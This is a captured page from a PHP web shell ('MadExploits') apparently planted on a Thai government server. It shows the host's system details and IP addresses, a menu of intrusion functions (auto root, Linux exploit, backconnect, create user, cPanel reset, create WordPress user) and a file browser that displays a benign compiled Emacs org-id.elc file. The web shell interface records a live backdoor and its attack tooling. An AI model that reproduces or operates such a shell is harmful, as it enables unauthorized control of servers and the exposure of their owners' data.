Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
org /
[ HOME SHELL ]
Name
Size
Permission
Action
org-agenda.elc
214.7
KB
-rw-r--r--
org-archive.elc
11.75
KB
-rw-r--r--
org-attach.elc
14.21
KB
-rw-r--r--
org-bbdb.elc
7.37
KB
-rw-r--r--
org-bibtex.elc
4.13
KB
-rw-r--r--
org-clock.elc
35.05
KB
-rw-r--r--
org-colview.elc
41.45
KB
-rw-r--r--
org-compat.elc
7.48
KB
-rw-r--r--
org-exp.elc
149.66
KB
-rw-r--r--
org-export-latex.elc
44.23
KB
-rw-r--r--
org-faces.elc
20.18
KB
-rw-r--r--
org-footnote.elc
13.77
KB
-rw-r--r--
org-gnus.elc
5.74
KB
-rw-r--r--
org-id.elc
16.92
KB
-rw-r--r--
org-info.elc
1.68
KB
-rw-r--r--
org-install.elc
635
B
-rw-r--r--
org-irc.elc
5.89
KB
-rw-r--r--
org-jsinfo.elc
5.39
KB
-rw-r--r--
org-list.elc
32.5
KB
-rw-r--r--
org-mac-message.elc
2.27
KB
-rw-r--r--
org-macs.elc
7.83
KB
-rw-r--r--
org-mew.elc
2.92
KB
-rw-r--r--
org-mhe.elc
5.16
KB
-rw-r--r--
org-mouse.elc
32.83
KB
-rw-r--r--
org-plot.elc
10.28
KB
-rw-r--r--
org-publish.elc
20.43
KB
-rw-r--r--
org-remember.elc
31.7
KB
-rw-r--r--
org-rmail.elc
2.82
KB
-rw-r--r--
org-table.elc
136.62
KB
-rw-r--r--
org-timer.elc
7.61
KB
-rw-r--r--
org-vm.elc
2.91
KB
-rw-r--r--
org-w3m.elc
3.88
KB
-rw-r--r--
org-wl.elc
2.82
KB
-rw-r--r--
org.elc
505.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org-id.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:45 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/org/org-id.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`org-id.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\305\306\307\310\301&\207" [require org custom-declare-group org-id nil "Options concerning global entry identifiers in Org-mode." :tag "Org ID" :group] 8) #@589 The method that should be used to create new IDs. If `uuidgen' is available on the system, it will be used as the default method. if not, the method `org' is used. An ID will consist of the optional prefix specified in `org-id-prefix', and a unique part created by the method this variable specifies. Allowed values are: org Org's own internal method, using an encoding of the current time to microsecond accuracy, and optionally the current domain of the computer. See the variable `org-id-include-domain'. uuidgen Call the external command uuidgen. (custom-declare-variable 'org-id-method '(condition-case nil (if (string-match "\\`[-0-9a-fA-F]\\{36\\}\\'" (org-trim (shell-command-to-string "uuidgen"))) 'uuidgen 'org) (error 'org)) '(#$ . 802) :group 'org-id :type '(choice (const :tag "Org's internal method" org) (const :tag "external: uuidgen" uuidgen))) #@216 The prefix for IDs. This may be a string, or it can be nil to indicate that no prefix is required. When a string, the string should have no space characters as IDs are expected to have no space characters in them. (custom-declare-variable 'org-id-prefix 'nil '(#$ . 1708) :group 'org-id :type '(choice (const :tag "No prefix") (string :tag "Prefix"))) #@434 Non-nil means, add the domain name to new IDs. This ensures global uniqueness of IDs, and is also suggested by RFC 2445 in combination with RFC 822. This is only relevant if `org-id-method' is `org'. When uuidgen is used, the domain will never be added. The default is to not use this because we have no really good way to get the true domain, and Org entries will normally not be shared with enough people to make this necessary. (custom-declare-variable 'org-id-include-domain 'nil '(#$ . 2068) :group 'org-id :type 'boolean) #@452 Non-nil means, track IDs through files, so that links work globally. This work by maintaining a hash table for IDs and writing this table to disk when exiting Emacs. Because of this, it works best if you use a single Emacs process, not many. When nil, IDs are not tracked. Links to IDs will still work within a buffer, but not if the entry is located in another file. IDs can still be used if the entry with the id is in the same file as the link. (custom-declare-variable 'org-id-track-globally 't '(#$ . 2605) :group 'org-id :type 'boolean) #@127 The file for remembering in which file an ID was defined. This variable is only relevant when `org-id-track-globally' is set. (custom-declare-variable 'org-id-locations-file '(convert-standard-filename "~/.emacs.d/.org-id-locations") '(#$ . 3158) :group 'org-id :type 'file) #@123 List of files with IDs in those files. Depending on `org-id-use-hash' this can also be a hash table mapping IDs to files. (defvar org-id-locations nil (#$ . 3440)) #@33 List of files that contain IDs. (defvar org-id-files nil (#$ . 3610)) #@434 Files to be searched for IDs, besides the agenda files. When Org reparses files to remake the list of files and IDs it is tracking, it will normally scan the agenda files, the archives related to agenda files, any files that are listed as ID containing in the current register, and any Org-mode files currently visited by Emacs. You can list additional files here. This variable is only relevant when `org-id-track-globally' is set. (custom-declare-variable 'org-id-extra-files ''org-agenda-text-search-extra-files '(#$ . 3687) :group 'org-id :type '(choice (symbol :tag "Variable") (repeat :tag "List of files" (file)))) #@263 Non-nil means, search also the archive files of agenda files for entries. This is a possibility to reduce overhead, but it means that entries moved to the archives can no longer be found by ID. This variable is only relevant when `org-id-track-globally' is set. (custom-declare-variable 'org-id-search-archives 't '(#$ . 4316) :group 'org-id :type 'boolean) #@161 Create an ID for the current entry and return it. If the entry already has an ID, just return it. With optional argument FORCE, force the creation of a new ID. (defalias 'org-id-get-create #[(&optional force) "\203\n \301`\302\303#\210\304`\305\"\207" [force org-entry-put "ID" nil org-id-get create] 4 (#$ . 4681) "P"]) #@80 Copy the ID of the entry at point to the kill ring. Create an ID if necessary. (defalias 'org-id-copy #[nil "\300\301\302\303\"!\207" [kill-new org-id-get nil create] 4 (#$ . 5009) nil]) #@329 Get the ID property of the entry at point-or-marker POM. If POM is nil, refer to the entry at point. If the entry does not have an ID, the function returns nil. However, when CREATE is non nil, create an ID if none is present already. PREFIX will be passed through to `org-id-new'. In any case, the ID of the entry is returned. (defalias 'org-id-get #[(&optional pom create prefix) "\304\305\"\211\203 ;\203 \306\307 \"\203 \2024 \n\2033 \310!\311\305 #\210\312 \313\314 !\"\210 \2024 \315)\207" [pom id create prefix org-entry-get "ID" string-match "\\S-" org-id-new org-entry-put org-id-add-location buffer-file-name buffer-base-buffer nil] 5 (#$ . 5203)]) #@274 Use outline-path-completion to retrieve the ID of an entry. TARGETS may be a setting for `org-refile-targets' to define the eligible headlines. When omitted, all headlines in all agenda files are eligible. It returns the ID of the entry. If necessary, the ID is created. (defalias 'org-id-get-with-outline-path-completion #[(&optional targets) "\206 \306\211\211@@)\203 \307\202 \310\311\312!\211\205( \313 \314\f8\315\fA@!\223\316 \317\" \320\211\223\210,\207" [targets org-refile-targets x org-refile-use-outline-path spos pom ((nil :maxlevel . 10)) file t org-refile-get-location "Entry: " make-marker 3 get-file-buffer org-id-get create nil] 5 (#$ . 5879)]) #@205 Use an outline-cycling interface to retrieve the ID of an entry. This only finds entries in the current buffer, using `org-get-location'. It returns the ID of the entry. If necessary, the ID is created. (defalias 'org-id-get-with-outline-drilling #[(&optional targets) "\303p\"\211\205 \304 @\305\223\306\n\307\"\n\305\211\223\210*\207" [org-goto-help spos pom org-get-location make-marker nil org-id-get create] 5 (#$ . 6559)]) #@101 Switch to the buffer containing the entry with id ID. Move the cursor to that entry in that buffer. (defalias 'org-id-goto #[(id) "\302\303\"\211\204 \304\305\"\210\306\307 !!\210 b\210 \310\211\223\210\311 )\207" [id m org-id-find marker error "Cannot find entry with ID \"%s\"" switch-to-buffer marker-buffer nil org-show-context] 4 (#$ . 7001) "sID: "]) #@217 Return the location of the entry with the id ID. The return value is a cons cell (file-name . position), or nil if there is no entry with that ID. With optional argument MARKERP, return the position as a new marker. (defalias 'org-id-find #[(id &optional markerp) "9\203\f \305!\202 \247\203 \306!\307!\310\211\211\203' \311\f# \204<